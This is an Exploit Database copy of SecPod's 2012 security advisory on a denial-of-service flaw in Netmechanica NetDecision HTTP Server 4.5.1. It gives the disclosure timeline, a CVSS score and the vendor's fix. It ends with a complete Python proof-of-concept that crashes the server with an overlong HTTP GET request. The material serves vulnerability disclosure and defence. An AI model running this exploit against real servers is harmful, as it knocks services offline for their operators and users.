Netmechanica NetDecision HTTP Server – Denial of Service

• Exploit Database
• 95 阅读

• 作者： SecPod Research
  日期： 2012-02-29
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18541/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  ############################################################################## # # Title: Netmechanica NetDecision HTTP Server Denial Of Service #Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.netmechanica.com # Advisory : http://secpod.org/blog/?p=484 #http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt # http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py # Software : Netmechanica NetDecision HTTP Server version 4.5.1 # Date : 05/12/2011 # ###############################################################################   SecPod ID: 1040 05/12/2011 Issue Discovered 21/02/2012 Vendor Notified 22/02/2012 Vendor Acknowledge 24/02/2012 Issue Resolved     Class: Denial Of Service Severity: Medium     Overview: --------- Netmechanica NetDecision HTTP Server version 4.5.1 is prone to a denial of service vulnerability.     Technical Description: ---------------------- The vulnerability is caused due to improper validation of long malicious HTTP request to web server, which allows remote attackers to crash the service.     Impact: -------- Successful exploitation could allow an attacker to cause denial of service condition.     Affected Software: ------------------ Netmechanica NetDecision 4.5.1 (full package) containing HTTP Server version 4.5.1     Tested on: ----------- Netmechanica NetDecision 4.5.1 (full package) containing HTTP Server version 4.5.1 on Windows XP SP3 & Win XP2. Older versions might be affected. Older versions might be affected.     References: ----------- http://secpod.org/blog/?p=484 http://www.netmechanica.com/downloads http://www.netmechanica.com/news/?news_id=26     Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py     Vendor URL: ---------------- http://www.netmechanica.com http://www.netmechanica.com/news/?news_id=26     Solution: ---------- Upgrade to NetDecision 4.6.1     Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR= NETWORK ACCESS_COMPLEXITY= LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT= PARTIAL EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL= UNAVAILABLE REPORT_CONFIDENCE= CONFIRMED CVSS Base Score= 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Risk factor= Medium     Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability.     #!/usr/bin/python ############################################################################## # # Title: Netmechanica NetDecision HTTP Server Denial Of Service #Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.netmechanica.com # Advisory : http://secpod.org/blog/?p=484 #http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt # http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py # Software : Netmechanica NetDecision HTTP Server version 4.5.1 # Date : 05/12/2011 # ###############################################################################   import socket,sys,time     if len(sys.argv) < 2: print "\t[-] Usage: python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py target_ip" print "\t[-] Example : python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py 127.0.0.1" print "\t[-] Exiting..." sys.exit(0)   port = 80 target = sys.argv[1]   try: socket.inet_aton(target) except socket.error: print "Invalid IP address found ..." sys.exit(1)   try: sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((target,port)) except: print "socket() failed: Server is not running" sys.exit(1)   exploit = "GET "+ "A"*1276 + "\r\n" + "\r\n"   print "HTTP GET request with long filename triggers the vulnerability" data = exploit sock.sendto(data, (target, port)) time.sleep(5) print "[+] Please verify the server daemon port, it must be down...."